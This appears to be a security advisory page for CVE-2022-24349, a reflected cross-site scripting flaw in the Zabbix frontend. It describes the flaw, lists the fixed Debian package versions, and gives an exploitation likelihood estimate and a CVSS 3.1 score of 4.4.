CVE-2022-24349
zabbix - security update
Description
An authenticated user can create a link with reflected XSS payload for actions’ pages, and send it to other users. Malicious code has access to all the same objects as the rest of the web page and can make arbitrary modifications to the contents of the page being displayed to a victim. This attack can be implemented with the help of social engineering and expiration of a number of factors - an attacker should have authorized access to the Zabbix Frontend and allowed network connection between a malicious server and victim’s computer, understand attacked infrastructure, be recognized by the victim as a trustee and use trusted communication channel.
How to fix CVE-2022-24349
To remediate CVE-2022-24349, upgrade the affected package to a fixed version below.
- —upgrade to 1:5.0.44+dfsg-1+deb11u1 or later
- —upgrade to 1:3.0.32+dfsg-0+deb9u3 or later
Is CVE-2022-24349 being exploited?
Low — EPSS is 0.8%, meaning exploitation activity has not been observed at scale.
Affected packages (2)
- from 0, < 1:5.0.44+dfsg-1+deb11u1
- from 0, < 1:3.0.32+dfsg-0+deb9u3
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM4.4 | CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N |